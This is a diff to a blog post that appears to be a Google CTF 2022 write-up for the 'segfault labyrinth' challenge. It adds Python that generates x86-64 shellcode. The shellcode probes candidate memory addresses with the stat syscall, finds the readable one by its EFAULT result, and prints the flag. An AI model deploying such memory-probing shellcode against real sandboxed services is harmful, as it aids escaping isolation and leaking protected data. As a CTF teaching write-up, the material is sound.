j3r3mias/j3r3mias.github.io/_posts/2022-07-14-google-ctf-writeup-segfault-labyrinth.markdown

     doors.append(hex(address))
 {% endhighlight %}

-Now we
-do not need to follow the rules of the labyrinth, and in one of the most naive approaches we could just test every address using `stat` or `write` and print the content every time the address is writable.
+Now we do not need to follow the rules of the labyrinth, and in one of the most naive approaches we could just test every address using `stat` or `write` and print the content every time the address is writable.
+This would requires a huge payload but we can improve this strategy testing only the doors of the last corridor where only one door has writable permissions.
+Then using the generated list of doors, the construction of the payload (using python) is the following:

+{% highlight python %}
+for addr in doors[-16:]: 		# Last 16 doors
+    door_code = f'''
+mov rdi, {addr}
+lea rsi, [rip + 950]
+mov rax, 4
+syscall
+// compare return with EFAULT (-14)
+cmp rax, -14
+jne print_flag
+'''
+    payload += door_code

+payload += '''
+print_flag:
+// write content
+mov rsi, rdi
+mov rdi, 1
+mov rdx, 0x100
+mov rax, 1
+syscall
+// exit
+mov rax, 0x3c
+xor rdi, rdi
+syscall
+nop
+nop
+nop
+nop
+'''
+{% endhighlight %}

+The loop in the code just creates a block of code that test each one of the last 16 doors appending to the payload.
+When the right one is found, the program jumps to the label `print_flag`, write the flag and exit successfully.

 ## 3 - Bonus: Lazy CTF Player